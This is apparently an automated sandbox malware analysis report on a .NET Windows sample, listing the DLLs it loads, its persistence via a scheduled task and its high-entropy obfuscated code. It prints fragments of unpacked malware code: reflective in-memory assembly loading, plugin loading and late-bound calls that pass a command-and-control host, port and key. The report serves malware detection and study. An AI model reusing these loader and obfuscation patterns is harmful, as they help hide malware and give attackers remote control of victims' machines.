                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, Main.cs.Net Code: InitializeComponent
                Source: pNYyTm.exe.1.dr, Main.cs.Net Code: InitializeComponent
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, QHOw32oMEn7lDsZbTi.cs.Net Code: JKIbqNsWCmVV7OsXQC3 System.Reflection.Assembly.Load(byte[])
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, QHOw32oMEn7lDsZbTi.cs.Net Code: JKIbqNsWCmVV7OsXQC3 System.Reflection.Assembly.Load(byte[])
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs.Net Code: Memory
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs.Net Code: Memory
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, QHOw32oMEn7lDsZbTi.cs.Net Code: JKIbqNsWCmVV7OsXQC3 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 1_2_05960B78 pushfd ; retf 1_2_05960B7C
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_064527EE push es; iretd 15_2_06452860
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_06450089 push es; iretd 15_2_06452860
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_064500AA push es; iretd 15_2_06452860
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_064500BF push es; iretd 15_2_06452860
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_0645014B push es; iretd 15_2_06452860
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_06450133 push es; iretd 15_2_06452860
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_06452C25 push es; ret 15_2_06452C3C
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_06452C3D push es; retf 15_2_06452D10
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_06450B78 pushfd ; retf 15_2_06450B7C
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeStatic PE information: section name: .text entropy: 7.966741357307765
                Source: pNYyTm.exe.1.drStatic PE information: section name: .text entropy: 7.966741357307765
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, lNjw1JhxSV5n0cCMNW.csHigh entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, NkEtj4xdihRGcDPjVY.csHigh entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.csHigh entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, NkEtj4xdihRGcDPjVY.csHigh entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, uBRAahgBpjjHAISb74.csHigh entropy of concatenated method names: 'K3FmbY1YJR', 'NXdmPvYn5c', 'hH2mGZk25c', 'YgMm9U3gmc', 'SdWm5WBtpe', 's8Omyf2IGH', 'oN4m6bh4Fj', 'oAfKqiuc5L', 'BHgK2qjDZP', 'JBMK0R6hgB'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, tqIBqAREa8Q6WD82rO.csHigh entropy of concatenated method names: 'oqepaiEAfx', 'O0ppMnjI6s', 'zASpuC6Uch', 'oNgpR5Bfx1', 'zihpLJfF5c', 'bYepcRpBqh', 'byFpH0hPBV', 'kbYpKSa3pa', 'slCpmXx3yQ', 'dY6pDERiVP'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, YrBo172giAk8gnYb5y.csHigh entropy of concatenated method names: 'jLNK9RkpjU', 'jDqK5srB9y', 'YNFKpqQ605', 'mlSKyNMo96', 'pjAK6PEMCb', 'WmGK1gCAG8', 'SvCKoLnoxa', 'YBGKkbZ0J2', 'j66KAEF65s', 'm8DKseDxsn'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, IGROvpvPicb6LXDyW8.csHigh entropy of concatenated method names: 'ToString', 'FRXceWUqUW', 'iWbcNSn1VL', 'WUOcYiy4nW', 'gfMcjosZX0', 'ec0cxHXLSb', 'z0xclwifYa', 'kEYcdamiwS', 'uDgcSWsyri', 'lEscCp8Zuy'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, cIaTm3psrRfHXmD1RG.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oCan0wQVis', 'WZZng9b3wj', 'PWbnzhdT6U', 'MdHP4yE005', 'sclPbT9YI5', 'cdbPnVqbBV', 'SV7PPnnbeL', 'STlOBbsUV3bnGufXjvA'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, y6w8lanDc3YI69TWBE.csHigh entropy of concatenated method names: 'nyeFQhnQR', 'ltLaMv2oY', 'dgdMFTuuV', 'AeX3aUBmU', 'MSRReNyvr', 'pyrhlU4rK', 'hPn8DBe9vHxtYNSPlh', 'qTHsxABh8jSIc25uaK', 'j9oKCMQAL', 'WirDCT9TW'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, fw1IB4uqclhjXGAZvN.csHigh entropy of concatenated method names: 'TJS589BsFN', 'L4a5trh7oD', 'lGG5vR5eHt', 'Ai75Q0fsUC', 'uuR5VZA5yf', 'Ji15XF87XY', 'tJi5qpmvY6', 'gd352If2fk', 'vD750Tpdrt', 'gu45gerD22'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, h8IVSedMFQpixvNuAY.csHigh entropy of concatenated method names: 'Uop19Sv7oZ', 'LCh1p4ygHC', 'wdD16GfXSs', 'mug6gL0SJi', 'QJr6zPMSRV', 'rRL14BF3S1', 'U6g1b2UMtm', 't5e1nGkEWF', 'ner1P78PNi', 'Nmd1GOvoiU'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, rqtLsRCgxuqruShBFT.csHigh entropy of concatenated method names: 'X0i1TxqR1y', 'W281BHixDh', 'd7X1Ff5JqD', 'ucp1a6P03u', 'tSi1OWedCB', 'SNL1MYapKf', 'W7M13s0Vda', 'WFy1u5BEQp', 'Kmp1Rj5jkl', 'e7P1hLmcf6'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, tAI8DEb4LaCGCcG8H2k.csHigh entropy of concatenated method names: 'dugmTYxeIh', 'sLQmBDpYo7', 'pkamF2fsW8', 'j9vmaWG1Iy', 'NpwmOFd8QN', 'irrmM5eVXr', 'b4cm3kDtwx', 's3LmuMG0k7', 'lbqmRgYJJd', 'DjlmhFTXcf'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, plmLCiQhBDHul7rqkX.csHigh entropy of concatenated method names: 'r0JHA2EhL5', 'pc5HstfjIL', 'ToString', 'ivhH9JrlJV', 'YTjH5EvEX2', 'TiaHpWwtHB', 'rKsHymhbFF', 'zGWH66NIxk', 'sGuH1ZFB4s', 'HylHouSDZA'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, OrioeaGQ0PM1syyFSu.csHigh entropy of concatenated method names: 'Wh9b1w1IB4', 'VclbohjXGA', 'lEabA8Q6WD', 'R2rbsOixDH', 'LWfbLWVXXg', 'GQTbcuS7Mq', 'AfX9rYZ8AUDXabg2KR', 'NsuwOIG8KB3G8YZtXj', 'JgqbbYma98', 'WKkbPIUESW'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, QHOw32oMEn7lDsZbTi.csHigh entropy of concatenated method names: 'PaDPJcZBwj', 'm6BP9oHuFS', 'vTrP5EGsJ9', 'DivPprJBnB', 'kCkPyW7e3L', 'DgtP6Iy9MZ', 'UhfP1B1IsJ', 'ig2PodeqMd', 'gLgPkiaAA3', 'HDVPAwpcL7'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, JAtyCrXlg8pJIddapt.csHigh entropy of concatenated method names: 'OqNH2OyRYv', 'Y3iHgyVFry', 'p8DK40Kvm2', 'YfIKbdCXLX', 'uCEHemnlm9', 'itoHwsc5sD', 'lQBHrenmsy', 'MLGH8TxLs8', 'q6fHtUsZFS', 'gSyHvxVuE5'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, PT5L9M0MhqK8Q0f7MB.csHigh entropy of concatenated method names: 'B0SKi9RZAa', 'alYKNVsR4I', 'k6tKYAZiXt', 'WyEKjouC94', 'p0dK8xMR1K', 'xHPKxNP1Vg', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, xZ6IqqbPfae5139K1hU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LCoD8uLU3x', 'M3PDt3SWOp', 'sEFDvqlpbx', 'cWxDQkJDKy', 'aaVDVfODUy', 'EJnDXHFVk8', 'GrYDqwbkrk'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, VXgNQTiuS7Mq9yDKkD.csHigh entropy of concatenated method names: 'VIl6J7ofwG', 'EKZ65uyQIS', 'S9M6yIycuy', 'dte61lTb4u', 'C996oyvDog', 'k8jyVMvgw2', 'zByyXhWeBH', 'CpVyqFV9G3', 'Hwny2GwGDL', 'kq1y0OpTMX'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, zV7Ah65u26UDaxa1D3.csHigh entropy of concatenated method names: 'Dispose', 'sZEb08TIDQ', 'fYXnNaZava', 'gtHwwSs2oe', 'egrbgBo17g', 'GAkbz8gnYb', 'ProcessDialogKey', 'gyrn4T5L9M', 'ChqnbK8Q0f', 'nMBnnIBRAa'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, Nv3sLXzlWLSj3jB4F1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0em7AeEpF', 'uXNmLZqKNN', 'JnLmcJvsgi', 'uprmHglUZF', 'vgQmKXd0hK', 'FEXmmalpvG', 'NZlmDerdZd'
